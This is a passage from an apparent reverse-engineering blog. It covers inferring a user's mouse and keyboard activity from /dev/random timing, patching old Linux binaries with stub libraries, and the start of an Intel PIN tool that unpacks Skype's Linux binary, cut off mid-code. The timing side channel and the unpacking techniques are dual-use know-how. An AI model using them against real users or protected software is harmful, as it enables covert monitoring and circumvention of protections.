<li class="li1">
<div class="de1">
<span class="kw1">def</span> main<span class="br0">(</span><span class="br0">)</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">while</span> <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
act = wait_for_activity<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> act<span class="br0">[</span><span class="nu0">0</span><span class="br0">]</span> == ACTIVITY_MOUSE:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">print</span> <span class="st0">"MOUSE ACTIVITY DETECTED"</span>, act<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">print</span> <span class="st0">"KEYBOARD ACTIVITY DETECTED"</span>, act<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> __name__ == <span class="st0">"__main__"</span>:
</div>
</li>
<li class="li1">
<div class="de1">
main<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
</ol>
</div>
<p>Execute this script and see if it works for you. In my case, reading 8 bytes typically takes 1 second or less when mouse events happen (normal stuff: browsing, reading mail, etc.) and 5 seconds or less for keystrokes. One problem I noticed is that the script often reports mouse events while I’m typing, when there are none (I think I type too fast for my script). In any case, it more or less works, on my home computer at least.</p>
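<p>The timing heuristic can be separated from /dev/random and exercised with made-up read durations. What follows is a minimal Python 3 sketch, not the original script: the function name classify_durations and the sample timings are assumptions made for illustration, while the 1 and 5 second thresholds and the counter logic follow the code above.</p>

```python
ACTIVITY_MOUSE = 0
ACTIVITY_KEYBOARD = 1


def classify_durations(durations):
    """Return (activity, seconds) for the first confirmed guess, else None.

    `durations` is an iterable with the time each blocking read took.
    (Hypothetical helper: the original script measures these itself.)
    """
    keyboard = 0
    mouse = 0
    for t in durations:
        if t <= 1:
            # Fast refill of the pool: treated as mouse activity.
            if mouse >= 1:
                return (ACTIVITY_MOUSE, t)
            mouse += 1
            keyboard -= 1
        elif t <= 5:
            # Slower refill: treated as keyboard activity.
            if keyboard >= 1:
                return (ACTIVITY_KEYBOARD, t)
            keyboard += 1
            mouse -= 1
        else:
            # Too slow to say anything: forget the pending guesses.
            keyboard = mouse = 0
    return None


if __name__ == "__main__":
    print(classify_durations([0.2, 0.3]))       # two fast reads in a row
    print(classify_durations([3.0, 4.0]))       # two slower reads in a row
    print(classify_durations([0.2, 3.0, 4.0]))  # mixed reads, no verdict yet
```

<p>Two consecutive reads in the same bucket are needed before a guess is reported, and a read in the other bucket cancels the pending one.</p>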
<p>In future posts I will hopefully be able to write a working program for Michal Zalewski’s (old) idea but, meanwhile, this is what I have working. I hope you find it interesting or useful. Bye!</p>
<p>&nbsp;</p>
joxean
Patching old linux binaries to work with recent libc versions
2012-11-14T18:45:02+01:00
http://joxeankoret.com/blog/2012/11/14/patching-old-linux-binaries-to-work-with-recent-libc-versions
<p>From time to time I need to use an old binary built for an older Linux distribution, Red Hat 6.2 for example. The problem is that such binaries were compiled against a very old glibc and cannot be run as-is on newer systems. Sometimes a symbolic link from the new library to the old name is enough, but not always. In this brief post I will show how to work around the typical relocation errors and undefined-symbol problems with old binaries.</p>
<!--more-->
<p>For this article I will use a program and a library for the RSIB protocol (if you search for it in Google or another search engine, you will find the binaries online easily). The program is called ‘interactive’ and the library ‘librsib.so.1.0’. First of all, we need to check which symbols or libraries are missing. We can find out by simply using the command ‘ldd’:</p>
<pre>$ ldd interactive
linux-gate.so.1 => (0xf7706000)
librsib.so => not found
libstdc++-libc6.1-1.so.2 => not found
libm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf76a9000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74ff000)
/lib/ld-linux.so.2 (0xf7707000)</pre>
<p> </p>
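<p>With only a handful of libraries the ldd output is easy to read by eye, but the check can also be scripted. Below is a small Python sketch that is not part of the original workflow: the function name missing_libraries is made up for illustration, and the sample text is simply the ldd output shown above.</p>

```python
def missing_libraries(ldd_output):
    """Return the library names that ldd reports as 'not found'."""
    missing = []
    for line in ldd_output.splitlines():
        # Lines look like "name => target"; the loader line has no "=>".
        name, sep, target = line.strip().partition(" => ")
        if sep and target.strip() == "not found":
            missing.append(name)
    return missing


SAMPLE = """\
linux-gate.so.1 => (0xf7706000)
librsib.so => not found
libstdc++-libc6.1-1.so.2 => not found
libm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf76a9000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74ff000)
/lib/ld-linux.so.2 (0xf7707000)
"""

if __name__ == "__main__":
    for name in missing_libraries(SAMPLE):
        print(name)
```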
<p>So we’re missing libstdc++-libc6.1-1.so.2 and librsib.so. We need 2 symbolic links for those libraries. For the 1st, I’ll try a symbolic link to my current libstdc++ library and for the 2nd I just need a symbolic link to the librsib.so.1.0 library I already have:</p>
<pre>$ ln -s /usr/lib32/libstdc++.so.6 libstdc++-libc6.1-1.so.2
$ ln -s librsib.so.1.0 librsib.so
$ export LD_LIBRARY_PATH=`pwd`
$ ldd interactive
linux-gate.so.1 => (0xf77db000)
librsib.so => /home/joxean/somepath/librsib.so (0xf77cc000)
libstdc++-libc6.1-1.so.2 => /home/joxean/somepath/libstdc++-libc6.1-1.so.2 (0xf76e7000)
libm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf768c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74e2000)
/lib/ld-linux.so.2 (0xf77dc000)
libgcc_s.so.1 => /lib/i386-linux-gnu/libgcc_s.so.1 (0xf74c4000)</pre>
<p> </p>
<p>OK, it seems to work, let’s try to run it:</p>
<pre>$ ./interactive
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __tic</pre>
<p> </p>
<p>It wasn’t that easy. The symbol __tic is not defined in our libstdc++ version and librsib.so needs it. So, what we’re going to do is to create another library defining the symbols we need and patch the binaries (librsib.so and interactive) so they use our newly created library instead.</p>
<pre>$ cat > libkk.c
int __tic(void)
{
return 0;
}
^C
$ gcc -m32 -shared -fPIC libkk.c -o libkk.so</pre>
<p> </p>
<p>Now that we have our new library with the undefined symbol we need to patch the binaries and make them use libkk.so instead of the old libstdc++ versions they were linked against. I’ll use <a href="http://pyew.googlecode.com">Pyew</a> for this:</p>
<pre>$ pyew interactive
(...)
[0x00000000]> /s libstdc++
HINT[0x00000878]: libstdc++-libc6.1-1.so.2.libm.so.6.libc.so.6.strcpy.printf._
[0x00000000]> s 0x878
[0x00000878:0x08048878]> x
0878 6C 69 62 73 74 64 63 2B 2B 2D 6C 69 62 63 36 2E libstdc++-libc6.
0888 31 2D 31 2E 73 6F 2E 32 00 6C 69 62 6D 2E 73 6F 1-1.so.2.libm.so
0898 2E 36 00 6C 69 62 63 2E 73 6F 2E 36 00 73 74 72 .6.libc.so.6.str
08A8 63 70 79 00 70 72 69 6E 74 66 00 5F 5F 77 72 69 cpy.printf.__wri</pre>
<p> </p>
<p>The name of the libstdc++ library is at offset 0x878. Let’s change it to our new library, libkk.so, by re-opening the file for editing and writing the new name:</p>
<pre>[0x00000878:0x08048878]> edit
[0x00000878:0x08048878]> wa libkk.so
[0x00000878:0x08048878]> s +8
[0x00000880:0x08048880]> wx 00
[0x00000880:0x08048880]> s 0x878
[0x00000878:0x08048878]> x
0878 6C 69 62 6B 6B 2E 73 6F 00 2D 6C 69 62 63 36 2E libkk.so.-libc6.
0888 31 2D 31 2E 73 6F 2E 32 00 6C 69 62 6D 2E 73 6F 1-1.so.2.libm.so
0898 2E 36 00 6C 69 62 63 2E 73 6F 2E 36 00 73 74 72 .6.libc.so.6.str
08A8 63 70 79 00 70 72 69 6E 74 66 00 5F 5F 77 72 69 cpy.printf.__wri
[0x00000878:0x08048878]> q</pre>
<p> </p>
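<p>The same edit can be scripted instead of done by hand in Pyew. The following Python sketch works on an in-memory copy of the bytes and is only an illustration: the function name replace_library_name is hypothetical, it patches the first NUL-terminated occurrence it finds, and it assumes no other string in the file shares those bytes. Try it on a copy of the binary, never on the only one you have.</p>

```python
def replace_library_name(data, old_name, new_name):
    """Overwrite the NUL-terminated string old_name with new_name.

    The new name must not be longer than the old one, so no other byte
    in the file moves. Leftover bytes of the old name stay in place, as
    in the hex dump above; the new NUL terminator hides them.
    Returns (patched_bytes, offset_of_the_name).
    """
    if len(new_name) > len(old_name):
        raise ValueError("new name is longer than the old one")
    offset = data.find(old_name + b"\x00")
    if offset < 0:
        raise ValueError("old name not found")
    patched = bytearray(data)
    # Same-length slice assignment: new name plus its terminator.
    patched[offset:offset + len(new_name) + 1] = new_name + b"\x00"
    return bytes(patched), offset


if __name__ == "__main__":
    # A tiny stand-in for the string table seen in the dump.
    table = b"\x00libstdc++-libc6.1-1.so.2\x00libm.so.6\x00libc.so.6\x00"
    patched, offset = replace_library_name(
        table, b"libstdc++-libc6.1-1.so.2", b"libkk.so")
    print(hex(offset), patched)
```

<p>Because the replacement is never longer than the original, the file size and every other offset stay the same, which is what makes this kind of patch safe without relinking.</p>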
<p>We have to patch the library librsib.so just as we did with the binary ‘interactive’ (I’m skipping this step here as it’s identical). Now, let’s see what happens when running the binary again:</p>
<pre>$ ./interactive
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __builtin_new</pre>
<p>Another undefined symbol we have to implement in our library. The function __builtin_new appears to allocate memory. Looking at the ‘interactive’ binary in IDA, it seems to receive only one parameter which, I guess, is the size of the memory to reserve:</p>
<pre>.text:00006159 align 10h
.text:00006160
.text:00006160 loc_6160: ; CODE XREF: Connect__38CClientInetCommunicationChannelFactoryPCcN21+F9j
.text:00006160 push 1Ch ; size parameter
.text:00006162 call ___builtin_new</pre>
<p> </p>
<p>So we need to edit the source of libkk again and add this new symbol:</p>
<pre>$ cat libkk.c
#include &lt;stdlib.h&gt;
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
$ gcc -m32 -shared -fPIC libkk.c -o libkk.so
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
./interactive: symbol lookup error: ./interactive: undefined symbol: __builtin_vec_new</pre>
<p> </p>
<p>We can run some parts of the binary! But we need to define some more symbols; in this case, __builtin_vec_new. After looking at the ‘interactive’ binary in IDA and searching a bit on the Internet, it seems that this function does effectively the same as __builtin_new so, let’s edit our library source again:</p>
<pre>$ cat libkk.c
#include &lt;stdlib.h&gt;
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
$ gcc -m32 -shared -fPIC libkk.c -o libkk.so
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
./interactive: symbol lookup error: ./interactive: undefined symbol: __builtin_vec_delete</pre>
<p> </p>
<p>Looks better, we have been able to reach the program’s prompt but, again, we have another undefined symbol: __builtin_vec_delete. After briefly checking in IDA that it only receives one parameter and considering that we wrapped the old symbols with mallocs, it’s clear that we need to wrap free in this function, let’s do this:</p>
<pre>$ cat libkk.c
#include &lt;stdlib.h&gt;
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
void __builtin_vec_delete(void *ptr)
{
free(ptr);
}
$ gcc -m32 -shared -fPIC libkk.c -o libkk.so
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
./interactive: symbol lookup error: /home/joxean/somepath/librsib.so: undefined symbol: __builtin_delete</pre>
<p> </p>
<p>Still one more undefined symbol. Exactly the same function as before with just a different name, let’s implement it, build the library and execute the binary again:</p>
<pre>$ cat libkk.c
#include &lt;stdlib.h&gt;
int __tic(void)
{
return 0;
}
void *__builtin_new(size_t size)
{
return malloc(size);
}
void *__builtin_vec_new(size_t size)
{
return malloc(size);
}
void __builtin_vec_delete(void *ptr)
{
free(ptr);
}
void __builtin_delete(void *ptr)
{
free(ptr);
}
$ gcc -m32 -shared -fPIC libkk.c -o libkk.so
$ ./interactive
Interactive Control Program
Copyright 2000 Rohde & Schwarz
All rigths reserved.
Type 'help' for help or 'q' to quit
: q
$</pre>
<p>Hurrah! Finally, we can run our old binary on the new system without errors (at least in what I tested). I hope this brief post helps somebody out there who ever runs into the same problem.</p>
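<p>The “run it, read the error, add a stub” loop used throughout this post lends itself to a little automation. As a hedged sketch, the Python helper below pulls the object and symbol names out of the loader’s message; the function name undefined_symbol is an assumption of mine, and the pattern only covers the message format shown in the transcripts above.</p>

```python
import re

# Matches e.g. "symbol lookup error: ./interactive: undefined symbol: __tic"
_UNDEFINED = re.compile(
    r"symbol lookup error: (?P<object>\S+): undefined symbol: (?P<symbol>\S+)"
)


def undefined_symbol(stderr_text):
    """Return (object, symbol) from a loader error, or None if absent."""
    match = _UNDEFINED.search(stderr_text)
    if match is None:
        return None
    return match.group("object"), match.group("symbol")


if __name__ == "__main__":
    message = ("./interactive: symbol lookup error: "
               "/home/joxean/somepath/librsib.so: undefined symbol: __tic")
    print(undefined_symbol(message))
```

<p>Writing the stub itself still needs a look at the disassembly, as above, to guess how many parameters the function takes and what it returns.</p>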
<p>PS: Thanks to pancake for helping me with it some time ago!</p>
<p>&nbsp;</p>
joxean
A simple PIN tool unpacker for the Linux version of Skype
2012-11-04T09:55:13+01:00
http://joxeankoret.com/blog/2012/11/04/a-simple-pin-tool-unpacker-for-the-linux-version-of-skype
<p>Some time ago I wanted to take a look at <a href="http://www.skype.com">Skype</a> to see how it works and get the class diagram of this program but, surprise: it’s packed. The Windows version is protected with a crypter of their own (UPDATE: this statement was wrong: <del>the last time I checked it, was protected with <a href="www.oreans.com/es/themida.php">Themida</a></del>. The application protected with Themida was Spotify). However, as I expected, the Linux version was simply packed (not protected), and with something easy to unpack. To unpack Skype and be able to analyse it in IDA and, also, to learn a bit about how <a href="http://www.pintool.org">Intel PIN</a> works, I have written a PIN tool to “automatically” unpack Skype.</p>
<!--more-->
<p><strong>Skype packer for Linux</strong></p>
<p>The packer used in Skype is pretty straightforward to unpack and we don’t really need an unpacker for it: if we just want to analyse it in IDA Pro we can simply do the following:</p>
<ol>
<li>Open it in IDA and let it finish the auto analysis.</li>
<li>Put an “execute” hardware breakpoint at entry point.</li>
<li>Execute it until the breakpoint is hit the 2nd time.</li>
<li>Take a memory snapshot of the loader segments in IDA.</li>
</ol>
<p>This is what it looks like before unpacking, right after the initial auto-analysis performed by IDA Pro:</p>
<div id="attachment_2203" style="width: 560px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin.png"><img class="size-large wp-image-2203" title="Skype binary before unpacking it in IDA" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-1024x666.png" alt="Skype binary before unpacking it in IDA" width="550" height="357" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-1024x666.png 1024w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin-300x195.png 300w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_bin.png 1134w" sizes="(max-width: 550px) 100vw, 550px" /></a>
<p class="wp-caption-text">
Skype binary before unpacking it in IDA
</p>
</div>
<p>And this is what it looks like after the hardware breakpoint is hit the 2nd time:</p>
<div id="attachment_2204" style="width: 572px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png"><img class=" wp-image-2204 " title="Skype unpacked" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png" alt="Skype unpacked" width="562" height="383" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked.png 975w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/skype_unpacked-300x204.png 300w" sizes="(max-width: 562px) 100vw, 562px" /></a>
<p class="wp-caption-text">
Skype unpacked, displaying the typical entry point of GCC-compiled code
</p>
</div>
<p>But, as previously stated, to learn a bit about how Intel PIN works I decided to write a simple “write and exec” unpacker for Skype and connect IDA Pro with PIN via the GDB server to take a memory snapshot when done. It will also be useful for other simple packers, not just for Skype’s Linux binary.</p>
<p><strong>Intel PIN</strong></p>
<p>PIN is a binary instrumentation framework created by Intel for x86 and x86_64 that lets us instrument code for any application written for those processors (in the past there was support for ARM and Itanium too, IIRC). Basically, it works by rewriting the real code the application executes, inserting our instrumentation code at different granularities (instruction level, basic block level, etc.). A simple PIN tool looks like the following (extracted from the PIN example tool):</p>
<div class="geshi no c">
<div class="head">
// Instruction count example
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="co1">// Actual instrumentation code</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> docount<span class="br0">(</span><span class="br0">)</span> <span class="br0">{</span> icount<span class="sy0">++</span>; <span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Code to check if we need to instrument an instruction</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> Instruction<span class="br0">(</span>INS ins, <span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Insert a call to docount before every instruction, no arguments are passed</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>docount, IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">INT32</span> Usage<span class="br0">(</span><span class="kw4">void</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
…
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// PIN stuff and instrumentation initialization</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">int</span> main<span class="br0">(</span><span class="kw4">int</span> argc, <span class="kw4">char</span> <span class="sy0">*</span> argv<span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Initialize pin</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span>PIN_Init<span class="br0">(</span>argc, argv<span class="br0">)</span><span class="br0">)</span> <span class="kw1">return</span> Usage<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register Instruction to be called to instrument instructions</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_AddInstrumentFunction<span class="br0">(</span>Instruction, <span class="nu0">0</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Start the program, never returns</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_StartProgram<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> <span class="nu0">0</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>In main we initialize PIN, set up instruction-level instrumentation and execute the program (PIN_StartProgram). Then, for every new instruction discovered by PIN, the callback “Instruction” is called. In this callback we decide which instructions we actually want to instrument by calling INS_InsertCall. From then on, the callback “docount” runs before each instrumented instruction is executed. And that’s it: we have a working example that counts the number of instructions a program executes.</p>
<p><strong>GDB Server</strong></p>
<p>In my opinion, one of the best features supported by Intel PIN is the “-appdebug” command line switch. This switch tells PIN to start a GDB server to debug the application. We can use this feature to debug any application running under PIN from IDA Pro, using the remote GDB debugger. The only “problem” (not really a problem, just annoying) is that we cannot specify the port PIN will listen on: it is randomly selected, so we need to change it in Debugger -> Process Options every time we execute PIN. For example, to debug Skype running the inscount0 example from IDA with the GDB server, we would execute a command like the following:</p>
<p><code class="language-plaintext highlighter-rouge">$ pin -appdebug -t source/tools/ManualExamples/obj-ia32/inscount0.so -- `which skype`<br />
Application stopped until continued from debugger.<br />
Start GDB, then issue this command at the (gdb) prompt:<br />
target remote :12587<br />
</code></p>
<p>Then set up the remote GDB connection from IDA Pro using the port shown in the output of the command (Debugger -> Process Options):</p>
<p><a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png"><img class="aligncenter size-full wp-image-2214" title="idapin_gdb" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png" alt="" width="710" height="301" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb.png 710w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb-300x127.png 300w" sizes="(max-width: 710px) 100vw, 710px" /></a></p>
<p>After setting it up, click OK and select Debugger -> Attach to process from IDA. In the next dialog, just press OK when asked to which process we want to attach and that’s all, we are debugging the process with PIN from IDA.</p>
<p><strong>A simple “write and exec” unpacker</strong></p>
<p>Let’s go back to the main purpose of this post: writing an unpacker for Skype as a PIN tool. What I will do is check whether any instruction in the main binary (skype) modifies any of the application’s segments (for example, if it writes to the .text section), remember them and, if the application jumps to execute code in any of the modified sections, raise an application breakpoint to inform the debugger that the process seems to be unpacked. It is a pretty simple idea that works for simple packers, like the one used in Skype.</p>
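<p>Before looking at the PIN code, the “write and exec” idea can be modelled in a few lines of plain Python. This is only a simulation under my own assumptions, not the PIN tool and not PIN’s API: the class name WriteExecTracker, its methods and the addresses in the demo are all invented for illustration.</p>

```python
import bisect


class WriteExecTracker:
    """Track writes to known segments and flag execution inside them."""

    def __init__(self, segments):
        # segments: iterable of (start_address, size) pairs
        self._segments = sorted(segments)
        self._starts = [start for start, _ in self._segments]
        self._written = set()

    def _find(self, address):
        """Return the start of the segment containing address, or None."""
        index = bisect.bisect_right(self._starts, address) - 1
        if index < 0:
            return None
        start, size = self._segments[index]
        return start if address < start + size else None

    def on_write(self, address):
        """Record that a memory write landed at address."""
        start = self._find(address)
        if start is not None:
            self._written.add(start)

    def on_execute(self, address):
        """True when the code about to run lives in a written segment."""
        return self._find(address) in self._written


if __name__ == "__main__":
    # Made-up segment layout: (start, size)
    tracker = WriteExecTracker([(0x8048000, 0x1000), (0x804A000, 0x2000)])
    print(tracker.on_execute(0x8048010))  # nothing written yet
    tracker.on_write(0x8048020)           # the stub decrypts code here
    print(tracker.on_execute(0x8048010))  # now it looks unpacked
```

<p>In the real tool the two events come from instrumentation callbacks, and the positive case raises a breakpoint for the debugger instead of returning a flag.</p>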
<p>In the PIN tool’s main function I set the instrumentation granularity to trace level (basic block level) and install another callback that will be called right before the application starts:</p>
<div class="geshi no c">
<div class="head">
//--------------------------------------------------------------------------
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">int</span> main<span class="br0">(</span><span class="kw4">int</span> argc, <span class="kw4">char</span> <span class="sy0">*</span>argv<span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Initialize PIN library. Print help message if -h(elp) is specified</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// in the command line or the command line is invalid </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span><span class="br0">(</span> PIN_Init<span class="br0">(</span>argc,argv<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> Usage<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called to instrument traces</span>
</div>
</li>
<li class="li1">
<div class="de1">
TRACE_AddInstrumentFunction<span class="br0">(</span>trace_cb, <span class="nu0">0</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called at application start time</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_AddApplicationStartFunction<span class="br0">(</span>app_start_cb, <span class="nu0">0</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called when the application exits</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_AddFiniFunction<span class="br0">(</span>fini_cb, <span class="nu0">0</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Start the program, never returns</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_StartProgram<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> <span class="nu0">0</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>In the “app_start_cb” function callback we will save the application’s segments in a std::map:</p>
<div class="geshi no c">
<div class="head">
(…)
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">struct</span> segdata_t
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
size_t size;
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT check;
</div>
</li>
<li class="li1">
<div class="de1">
bool written;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">typedef</span> std<span class="sy0">::</span><span class="me2">map</span><span class="sy0">&lt;</span>ADDRINT, segdata_t<span class="sy0">&gt;</span> segmap_t;
</div>
</li>
<li class="li1">
<div class="de1">
segmap_t seg_bytes;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">(</span>…<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">//--------------------------------------------------------------------------</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">static</span> <span class="kw4">VOID</span> app_start_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
IMG img <span class="sy0">=</span> APP_ImgHead<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span><span class="br0">(</span> SEC sec<span class="sy0">=</span> IMG_SecHead<span class="br0">(</span>img<span class="br0">)</span>; SEC_Valid<span class="br0">(</span>sec<span class="br0">)</span>; sec <span class="sy0">=</span> SEC_Next<span class="br0">(</span>sec<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT sec_ea <span class="sy0">=</span> SEC_Address<span class="br0">(</span>sec<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// is the segment loaded in the process memory?</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> sec_ea <span class="sy0">!=</span> <span class="nu0">0</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT check;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// copy the first DWORD/QWORD to check if it was really changed</span>
</div>
</li>
<li class="li1">
<div class="de1">
size_t bytes <span class="sy0">=</span> PIN_SafeCopy<span class="br0">(</span><span class="sy0">&amp;</span>check, <span class="br0">(</span><span class="kw4">void</span><span class="sy0">*</span><span class="br0">)</span>sec_ea, <span class="kw4">sizeof</span><span class="br0">(</span>ADDRINT<span class="br0">)</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> bytes <span class="sy0">==</span> <span class="kw4">sizeof</span><span class="br0">(</span>ADDRINT<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> min_ea <span class="sy0">&gt;</span> sec_ea || min_ea <span class="sy0">==</span> <span class="nu0">0</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
min_ea <span class="sy0">=</span> sec_ea;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> max_ea <span class="sy0">&lt;</span> sec_ea || max_ea <span class="sy0">==</span> <span class="br0">(</span><span class="kw4">unsigned</span><span class="br0">)</span><span class="nu0">-1</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
max_ea <span class="sy0">=</span> sec_ea;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
segdata_t seg;
